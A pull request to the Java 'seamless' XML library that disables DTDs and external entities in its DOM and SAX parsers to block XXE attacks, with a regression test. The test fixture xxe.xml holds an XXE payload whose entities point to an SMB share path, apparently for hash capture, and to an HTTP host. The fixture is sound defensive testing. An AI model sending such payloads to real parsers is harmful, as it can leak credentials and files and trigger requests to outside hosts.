### PR TITLE
Configure parser factories to prevent XXE attacks

### DIFF
--- a/xml/src/main/java/org/seamless/xml/DOMParser.java
+++ b/xml/src/main/java/org/seamless/xml/DOMParser.java
@@ -136,6 +136,15 @@ public abstract class DOMParser<D extends DOM> implements ErrorHandler, EntityRe
                 factory.setFeature("http://apache.org/xml/features/xinclude/fixup-base-uris", false);
                 factory.setFeature("http://apache.org/xml/features/xinclude/fixup-language", false);
 
+                // Configure parser to prevent XXE attacks
+                factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+                factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+                factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+                factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
+                factory.setXIncludeAware(false);
+                factory.setExpandEntityReferences(false);
+
+
                 // Good idea to set a schema when you want to validate! Tell me, how does it work
                 // without a schema?!
                 factory.setSchema(getSchema());

--- a/xml/src/main/java/org/seamless/xml/SAXParser.java
+++ b/xml/src/main/java/org/seamless/xml/SAXParser.java
@@ -65,16 +65,23 @@ public class SAXParser {
 
     protected XMLReader create() {
         try {
+            SAXParserFactory factory = SAXParserFactory.newInstance();
+
+            // Configure factory to prevent XXE attacks
+            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+            factory.setXIncludeAware(false);
+
+            factory.setNamespaceAware(true);
+
             if (getSchemaSources() != null) {
-                // Jump through all the hoops and create a validating reader
-                SAXParserFactory factory = SAXParserFactory.newInstance();
-                factory.setNamespaceAware(true);
                 factory.setSchema(createSchema(getSchemaSources()));
-                XMLReader xmlReader = factory.newSAXParser().getXMLReader();
-                xmlReader.setErrorHandler(getErrorHandler());
-                return xmlReader;
             }
-            return XMLReaderFactory.createXMLReader();
+
+            XMLReader xmlReader = factory.newSAXParser().getXMLReader();
+            xmlReader.setErrorHandler(getErrorHandler());
+            return xmlReader;
         } catch (Exception ex) {
             throw new RuntimeException(ex);
         }

--- a/xml/src/test/java/org/seamless/test/xml/SAXParserTest.java
+++ b/xml/src/test/java/org/seamless/test/xml/SAXParserTest.java
@@ -1,0 +1,50 @@
+/*
+* Copyright (C) 2018 Matthew Piggott
+*
+* The contents of this file are subject to the terms of either the GNU
+* Lesser General Public License Version 2 or later ("LGPL") or the
+* Common Development and Distribution License Version 1 or later
+* ("CDDL") (collectively, the "License"). You may not use this file
+* except in compliance with the License. See LICENSE.txt for more
+* information.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+*/
+package org.seamless.test.xml;
+
+import static org.testng.Assert.assertTrue;
+import static org.testng.Assert.fail;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+import org.seamless.xml.ParserException;
+import org.seamless.xml.SAXParser;
+import org.testng.annotations.Test;
+import org.xml.sax.InputSource;
+
+/**
+ * @author Matthew Piggott
+ */
+public class SAXParserTest {
+
+    @Test
+    public void testXxe() throws IOException {
+        SAXParser parser = new SAXParser();
+
+        InputStream in = null;
+        try {
+            in = getClass().getResourceAsStream("/org/seamless/test/xml/xxe.xml");
+            parser.parse(new InputSource(in));
+            fail("Expected exception thrown");
+        } catch (ParserException e) {
+            assertTrue(e.getMessage().contains("DOCTYPE is disallowed"));
+        } finally {
+            if (in != null) {
+                in.close();
+            }
+        }
+    }
+}

--- a/xml/src/test/resources/org/seamless/test/xml/xxe.xml
+++ b/xml/src/test/resources/org/seamless/test/xml/xxe.xml
@@ -1,0 +1,7 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
+<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
+]>
+<hello>&xxe;&xxe-url;</hello>


### PR DESCRIPTION
Fix for #9  based on the [OWASP Cheat Sheet](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Java)

I attempted a test for `DOMParser` but even without the changes the parser would fail with a `ParserException`, its unclear to me whether it was an error in my hamfisted XHTML or the parser as it exists wouldn't have been vulnerable to an XXE.